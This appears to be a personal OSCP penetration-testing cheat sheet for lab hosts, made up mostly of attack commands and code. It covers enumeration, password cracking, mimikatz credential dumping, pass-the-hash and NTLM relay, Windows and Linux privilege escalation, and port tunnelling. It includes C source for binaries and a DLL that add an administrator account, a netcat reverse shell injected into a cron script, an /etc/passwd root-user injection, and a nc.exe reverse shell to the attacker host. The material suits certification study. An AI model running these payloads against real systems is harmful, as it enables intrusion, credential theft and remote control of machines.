OSCP Cheat Sheet (Updating)

Refer

OSCP Playbook: https://fareedfauzi.gitbook.io/oscp-playbook/services-enumeration/smb

GTFOBins: https://gtfobins.github.io/gtfobins/apt-get/#sudo

Setup

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" learner@192.168.50.52
sudo updatedb
locate XXX
sudo openvpn universal.ovpn

Recon

Passively Gather

// Whois
whois megacorpone.com -h 192.168.50.251
whois 38.100.193.70 -h 192.168.50.251 #reverse lookup
// Google Hacking
site:megacorpone.com
// Github Search
Gitleaks, Gitrob
// Shodan
hostname:megacorpone.com
// SSL/TLS Headers
Disabling the TLS_DHE_RSA_WITH_AES_256_CBC_SHA suite has been recommended for several years

Actively Gather

DNS Enumeration

// DNS Enumeration - linux
NS, A, AAAA, MX, PTR, CNAME, TXT
host www.megacorpone.com
host -t mx megacorpone.com
// DNS Enumeration in batches
//domain
sudo apt install seclists
for ip in $(cat list.txt); do host $ip.megacorpone.com; done
//reverse lookup(if PTR)
for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found"
//tools
dnsrecon -d megacorpone.com -t std // std=standard type
dnsrecon -d megacorpone.com -D ~/list.txt -t brt //subdomain
dnsenum megacorpone.com // forward+reverse lookups
// DNS Enumeration - Windows

nslookup mail.megacorptwo.com
nslookup -type=TXT info.megacorptwo.com 192.168.50.151

TCP/UDP (Linux)

// TCP
nc -nvv -w 1 -z 192.168.50.152 3388-3390
// UDP
nc -nv -u -z -w 1 192.168.50.149 120-123
// nmap
sudo iptables -I INPUT 1 -s 192.168.50.149 -j ACCEPT
sudo iptables -I OUTPUT 1 -d 192.168.50.149 -j ACCEPT
sudo iptables -Z //refresh
nmap 192.168.50.149
sudo iptables -vn -L
sudo nmap -sS 192.168.50.149
nmap -sT 192.168.50.149
sudo nmap --min-rate 2000 -sS 192.168.226.188 -Pn -T4 -p 1-65535
// nmap udp
sudo nmap -sU 192.168.50.149
// nmap combine
sudo nmap -sU -sS 192.168.50.149
// nmap active hosts
nmap -sn 192.168.50.1-253

nmap -v -sn 192.168.50.1-253 -oG ping-sweep.txt
grep Up ping-sweep.txt | cut -d " " -f 2
// nmap service version
nmap -sV 192.168.50.1 -p T:135,445 U:123
nmap -A 192.168.50.1 -p T:135,445 U:123
// nmap overall
nmap -sT -A --top-ports=20 192.168.50.1-253 -oG top-port-sweep.txt
// nmap os guess, and
sudo nmap -O 192.168.50.14 --osscan-guess
nmap -sT -A 192.168.50.14 (-sV for plain service)
// nmap script
nmap --script http-headers 192.168.50.6 // /usr/share/nmap/scripts
nmap --script-help http-headers

TCP/UDP(Windows)

Test-NetConnection -Port 445 192.168.50.151
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null

SMB

nmap -v -p 139,445 -oG smb.txt 192.168.50.1-254 // NetBIOS 139, SMB 445
sudo nbtscan -r 192.168.50.0/24 // NetBIOS, -r UDP 137
ls -1 /usr/share/nmap/scripts/smb* //nmap NSE scripts for smb
nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152

//exploit
nmap -T5 -sV --script 'smb-vuln*' <IP>
rdpscan <IP> // for BlueKeep (CVE-2019-0708)
crackmapexec smb <IP> -u '' -p '' --shares
rpcclient -U "" -N $ip
enum4linux -a $ip
smbclient -L $IP
smbclient \\\\$ip\\[share name]
smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234

*Windows*
net view \\dc01 /all
net use Z: \\dc01\C$

SMTP

nc -nv 192.168.50.8 25
VRFY root

//user enumeration
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip

smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t $ip

for server in $(cat smtpmachines); do echo "******************" $server "*****************"; smtp-user-enum -M VRFY -U userlist.txt -t $server;done #for multiple servers

**Windows**

Test-NetConnection -Port 25 192.168.50.8

dism /online /Enable-Feature /FeatureName:TelnetClient // download
c:\windows\system32\telnet.exe // grab from other machines
telnet 192.168.50.8 25
VRFY goofy

SNMP

sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt
//probe
echo public > community
echo private >> community
echo manager >> community
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
onesixtyone -c community -i ips
//query MIB
snmpwalk -c public -v1 -t 10 192.168.50.151 (-Oa hex->string)
//enumerate windows users on the dc
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25
//enumerate current running processes
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2
//enumerate all installed software
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2
//enumerate all the current TCP listening ports
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3

HTTP

gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5

misc

//kali RDP
xfreerdp /u:student /p:lab /v:192.168.240.152 /dynamic-resolution
// Domain
net time /domain
ipconfig /all
systeminfo

// get an interactive shell via pty before ssh
python3 -c 'import pty; pty.spawn("/bin/bash")'

Exploits

The Exploit Database: https://www.exploit-db.com/
Packet Storm: https://packetstormsecurity.com
google hacking: Microsoft Edge site:exploit-db.com

Metasploit
Core Impact
Canvas
Browser Exploitation Framework (BeEF)

exploitdb
sudo apt update && sudo apt install exploitdb
/usr/share/exploitdb/
searchsploit
searchsploit afd windows local
searchsploit -t oracle windows
searchsploit -p 39446
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit -s Apache Struts 2.0.0
searchsploit linux reverse password
searchsploit -j 55555 | json_pp
searchsploit remote smb microsoft windows
searchsploit -m windows/remote/48537.py //copy to current dir
searchsploit -m 42031

nmap
grep Exploits /usr/share/nmap/scripts/*.nse
nmap --script-help=clamav-exec.nse

Script

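#!/bin/bash
# Run a command once for every line of a dictionary file, appending the
# line as the command's last argument.
#
# Usage: <script> <dictionary_file> <command...>
#   The command part is evaluated by the shell, so it may contain shell
#   syntax (pipes, redirections); the dictionary line is always handed to
#   it as one single argument.
# Exits 1 when the dictionary file does not exist.

# Take the command line arguments: first the file, the rest is the command.
dictionary_file=$1
shift
command_to_run="$*"

# Check that the dictionary file exists (diagnostic goes to stderr).
if [ ! -f "$dictionary_file" ]; then
  echo "字典文件不存在: $dictionary_file" >&2
  exit 1
fi

# Loop over every line of the file; the `|| [ -n "$line" ]` also handles a
# last line without a trailing newline.
# The line is passed to the command through the expansion "$line" at eval
# time rather than spliced into the eval string, so a quote or shell
# metacharacter inside the dictionary is never re-parsed as shell code
# (the previous `'$line'` form broke on any line containing a single quote).
while IFS= read -r line || [ -n "$line" ]; do
  eval "$command_to_run"' "$line"'
done < "$dictionary_file"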

// scan 445

for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done

Password Crack

## Password Manager
KeePass, .kdbx
// get the location of the file
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
// extract the passwords using JtR suite
keepass2john Database.kdbx > keepass.hash
hashcat --help | grep -i "KeePass"
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

## 3389, RDP
// brute force
hydra -l nadine -P /usr/share/wordlists/rockyou.txt rdp://192.168.233.227

## SSH Private Key Passphrase
> chmod 600 id_rsa
> ssh2john id_rsa > ssh.hash
> cat ssh.rule
[List.Rules:sshRules]
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#
> sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
> john --wordlist=ssh.passwords --rules=sshRules ssh.hash
> ssh -i id_rsa dave@192.168.233.201 -p 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null

# NTLM
Get-LocalUser
.\mimikatz.exe
privilege::debug

// option 1
sekurlsa::logonpasswords
// option2
token::elevate
lsadump::sam

hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# Hash Pass - NTLM
// others: CrackMapExec,
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212 (cmd.exe)

impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

# Hash Capture - Net-NTLMv2 (unprivileged)
// set up a smb server to capture the hash in the request sent from victims
net user paul
sudo responder -I tun0
dir \\192.168.119.2\test
hashcat --help | grep -i "ntlm"
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
// try the login form by UNC in the web applications
Content-Disposition: form-data; name="myFile"; filename="\\\\192.168.45.204\\test"

# Hash Relaying - Net-NTLMv2
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
https://www.revshells.com/
dir \\192.168.119.2\test

# brute force ssh
crunch 6 6 -t Lab%%% > wordlist (passwords list Lab001,Lab002 ...)
hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V

Privilege Escalation

Windows

Privilege Escalation by enumerating windows

# Information Gathering

- Username and hostname
> whoami
- Group memberships of the current user
> whoami / groups
- Existing users and groups
> powershell
> Get-LocalUser
> Get-LocalGroup / net localgroup
> Get-LocalGroupMember Administrators
- Operating system, version and architecture
> systeminfo
- Network information
> ipconfig /all
> route print
> netstat -ano
- Installed applications
> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname //32bit
> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname //64bit
> dir C:\Program Files
> dir C:\Downloads
- Running processes
> Get-Process

# Information Gathering through file system

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

// WinRM or RDP to access the system if the user is a member of the corresponding groups
// if the target user has the Log on as a batch job access right -> schedule task to execute programs as the target user
// If the target user has an active session -> psexec to execute command as the user
// If having GUI, use Runas in powershell to start cmd as the user of which we have credential
runas /user:backupadmin cmd

# Information Gathering through logs
// PowerShell Transcription and PowerShell Script Block Logging.
Get-History
(Get-PSReadlineOption).HistorySavePath
//Sometimes creating a remote PowerShell session via WinRM in a bind shell can cause unexpected behavior, so we use evil-winrm
evil-winrm -i target -u daveadmin -p "qwertqwertqwert123\!\!"

# Automate Enumeration (not that reliable)
A:cp /usr/share/peass/winpeas/winPEASx64.exe .
A:python3 -m http.server 80

V:iwr -uri http://192.168.118.2/winPEASx64.exe -Outfile winPEAS.exe
V:.\winPEAS.exe

Privilege escalation by leveraging windows services

  • service hijacking
//snap-in services.msc, the Get-Service Cmdlet, or the Get-CimInstance Cmdlet (superseding Get-WmiObject) to list services on the machine
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
//choose between the traditional `icacls` Windows utility or the PowerShell Cmdlet `Get-ACL` to query the permissions
MASK PERMISSIONS
F Full access
M Modify access
RX Read and execute access
R Read-only access
W Write-only access
> icacls "C:\xampp\mysql\bin\mysqld.exe"
// when F permission, we can replace binary with a evil one
#include <stdlib.h>

int main ()
{
int i;

i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");

return 0;
}
kali > x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
win > iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
win > move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
win > move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
win > net stop mysql // no permission
// check Startup Type of the service
win > Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
// Should have SeShutdownPrivilege to reboot (a "Disabled" state means nothing)
win > whoami /priv
win > shutdown /r /t 0
win > Get-LocalGroupMember administrators

  • Automated tool to get all modifiable services and replace binary with bad ones
kali > cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .
kali > python3 -m http.server 80
win > iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
win > powershell -ep bypass
win > . .\PowerUp.ps1
// list modifiable services
win > Get-ModifiableServiceFile
// replace binary and restart it - default behavior is to create user `john` with the password `Password123!`, and add it to the local Administrators group
win > Install-ServiceBinary -Name 'mysql'
  • DLL Hijacking
/* when a DLL is missing from an application and safe DLL search mode is disabled, we can put a malicious DLL in the current directory 

General DLL loading order:
1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory.
5. The current directory.
6. The directories that are listed in the PATH environment variable.

*/
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
// if we don't have permission to replace the binary, we can try DLL Hijacking
> icacls .\Documents\BetaServ.exe
note: if limited permission, copy the binary to local machine to analyze
> C:\tools\Procmon\Procmon64.exe
note: create a filter by Filter menu > Filter... -> process name is XXX
> Restart-Service BetaService OR execute the binary on the local environment
> $env:path
//malicious dll
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
kali > x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
win > iwr -uri http://kali/myDLL.dll -Outfile myDLL.dll
win > Restart-Service BetaService
win > net user / net localgroup administrators
  • Unquoted Service Paths
/* 

how Windows will try to locate the correct path of an unquoted service

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

*/
// filter services with unquoted service path
// option1
> Get-CimInstance -ClassName win32_service | Select Name,State,PathName
// option2
> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
// check if the user has the permission to start or stop a service
> Start-Service GammaService
> Stop-Service GammaService
// check if the user has the `W` access rights
> icacls "C:\Program Files"
> icacls "C:\Program Files\Enterprise Apps"
// same as the rest of the processes in the chapter of "Service Binary Hijacking"
> iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe
> copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
> Start-Service GammaService (although errors may be reported, still can work)

// Automated tool to conduct unquoted service paths attack, creating a user john@Password123!
> iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
> powershell -ep bypass
> . .\PowerUp.ps1
> Get-UnquotedService
> Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe" (target vulnerable location)
> Restart-Service GammaService
> net user / net localgroup Administrators
  • Scheduled Tasks
// ScheduledTask1 Cmdlet or the command schtasks /query

> schtasks /query /fo LIST /v
> icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
> iwr -Uri http://kali/adduser.exe -Outfile BackendCacheCleanup.exe
> move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak
> move .\BackendCacheCleanup.exe .\Pictures\
> net user / net localgroup administrators

  • Using Exploits
- Exploit programs' vulnerabilities with high permission running in the system 
- Exploit vulnerabilities existing in the Windows kernel.

- Leverage non-privileged users with assigned privileges (SeImpersonatePrivilege) (RPC, named pipes)
// Other privileges that may lead to privilege escalation are SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, and SeDebug.
// IIS server normally has SeImpersonatePrivilege. We can use printspoofer to exploit it.
// Other tools: RottenPotato, SweetPotato, or JuicyPotato
win > whoami /priv
kali > wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
kali > python3 -m http.server 80
win > powershell
win > iwr -uri http://kali/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
win > .\PrintSpoofer64.exe -i -c powershell.exe
win > whoami
  • Others:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#eop---privileged-file-write

Linux

  • Enumerating Linux
id
cat /etc/passwd (id 1000+)
hostname
// os version (kernel exploit)
cat /etc/issue
cat /etc/os-release
uname -a

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"

//list processes
ps aux

ip a
// display network routing tables
routel | route
// list all connections
ss -anp
// firewall rules (also `iptables-save` )
cat /etc/iptables/rules.v4
// list cron jobs' subdirectory
ls -lah /etc/cron*
// list current user's scheduled jobs
crontab -l
sudo crontab -l (regular user has permission to sudo list cron jobs)
grep "CRON" /var/log/syslog // for cron jobs log
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh
// list applications
dpkg -l
// list all writable directories
find / -writable -type d 2>/dev/null
// check the existence of unmounted drives
cat /etc/fstab
mount
// list all available disks
lsblk
// list loaded kernel modules (search exploit)
lsmod
// detailed kernel module info
/sbin/modinfo libata(certain module_name)
// SetUID, SetGID (GTFOBins)
find / -perm -u=s -type f 2>/dev/null
// if `find` has SetUID
find /home/joe/Desktop -exec "/usr/bin/bash" -p \;
// linux capabilities (GTFOBins)
/usr/sbin/getcap -r / 2>/dev/null
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' (https://gtfobins.github.io/)
// environment variables
env
cat .bashrc
// verify if running as a privileged user (GTFOBins)
sudo -l (GTFOBins)
sudo -i
cat /var/log/syslog | grep tcpdump // AppArmor defender

// inspecting service footprints
watch -n 1 "ps -aux | grep pass"
// capture traffic
sudo tcpdump -i lo -A | grep "pass"

// if /etc/passwd writable
openssl passwd w00t
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2 //with password w00t
id

//automated tools
./unix-privesc-check standard > output.txt
LinEnum
linux-exploit-suggester

Port Redirection and SSH Tunneling

Linux Port Forwarding

// Port Forwarding
victim > socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432
kali > psql -h 192.168.50.63 -p 2345 -U postgres
> \l
> \c confluence
> select * from cwd_user;
////{PKCS5S2}skupO/gzzNBHhLkzH3cejQRQSP9vY4PJNT6DrjBYBs23VRAq4F5N85OAAdCv8S34
kali > hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt

Linux SSH Tunneling

  • SSH Local Port Forwarding
// SSH Local Port Forwarding
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215 (-v)
  • SSH Dynamic Port Forwarding
// SSH Dynamic Port Forwarding
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215
tail /etc/proxychains4.conf
[ProxyList]
socks5 192.168.50.63 9999
proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
// Lowering the tcp_read_time_out and tcp_connect_time_out values in the Proxychains configuration
proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217
  • SSH Remote Port Forwarding
// kali ssh server, set up a listening tcp port on kali;
// victim ssh client, ssh to kali
// All the traffic is pushed by Kali toward the ssh client
// ssh client forwards all the traffic from the ssh server to any target as long as it is configured
// PasswordAuthentication to yes in /etc/ssh/sshd_config
kali> sudo systemctl start ssh
kali> sudo ss -ntplu
victim > python3 -c 'import pty; pty.spawn("/bin/bash")'
// -R kaliIP:port
victim > ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4
kali > psql -h 127.0.0.1 -p 2345 -U postgres
> \l
  • SSH Remote Dynamic Port Forwarding
// only the OpenSSH client needs to be version 7.6 or above to use it - the server version doesn't matter
kali> sudo systemctl start ssh
kali> sudo ss -ntplu
victim > python3 -c 'import pty; pty.spawn("/bin/bash")'
victim > ssh -N -R 9998 kali@192.168.118.4
kali > vim /etc/proxychains4.conf
[ProxyList]
socks5 127.0.0.1 9998
proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64
  • Using sshuttle
victim > socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22
kali > sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24
kali > smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

Port Forwarding with Windows Tools

  • SSH
// Since version 1803 (April 2018 Update), ssh utilities are bundled with Windows in %systemdrive%\Windows\System32\OpenSSH

// Remote dynamic port forward (OpenSSH > 7.6)
kali > sudo systemctl start ssh
win > where ssh
win > ssh -N -R 9998 kali@192.168.118.4
kali > ss -ntplu
kali > vim /etc/proxychains4.conf
[ProxyList]
socks5 127.0.0.1 9998
kali > proxychains psql -h 10.4.50.215 -U postgres
> \l
  • Plink
// PuTTY
kali > sudo systemctl start apache2
kali > find / -name plink.exe 2>/dev/null
kali > sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/
windows > powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe

  • Netsh

File Transfer

  • windows -> kali
/// 1
Python -m pyftpdlib -w
Windows machine: ftp Open <Linux IP> <Port> User: anonymous Password: anonymous
Put <windows_file>

/// 2
Start an impacket smb server on kali with smb2 support flag.
On windows victim power shell: copy-item <target file> \\<kali ip>\<share name>\<destination file name>

impacket-smbserver test . -smb2support -username kourosh -password kourosh
//option 1 on windows
copy-item .\Database.kdbx \\192.168.45.204\test\Database.kdbx
//option2 on windows
net use m: \\Kali_IP\test /user:kourosh kourosh
copy mimikatz.log m:\

/// 3
xfreerdp /cert-ignore /compression /auto-reconnect /u:offsec /p:lab /v:192.168.212.250 /w:1600 /h:800 /drive:test,/home/kali/Documents/pen-200

copy mimikatz.log \\tsclient\test\mimikatz.log

/// 4
Using powercat + powershell. Host powercat.ps1(link: https://github.com/besimorhino/powercat/blob/master/powercat.ps1) in a webserver on the attacker machine. Execute powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://kali-ip/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FiletoTransfer" On kali: wget http://windows-ip:4444/FileToTransfer

  • kali -> windows
// 1 
kali > python3 -m http.server 80
win > iwr -uri http://kali/adduser.exe -Outfile adduser.exe

// 2
kali > sudo systemctl start apache2
kali > find / -name nc.exe 2>/dev/null
kali > sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/
windows > powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

Reverse Shell

  • Windows
kali > sudo systemctl start apache2
kali > find / -name nc.exe 2>/dev/null
kali > sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/
windows > powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
kali > nc -nvlp 4446
windows > C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446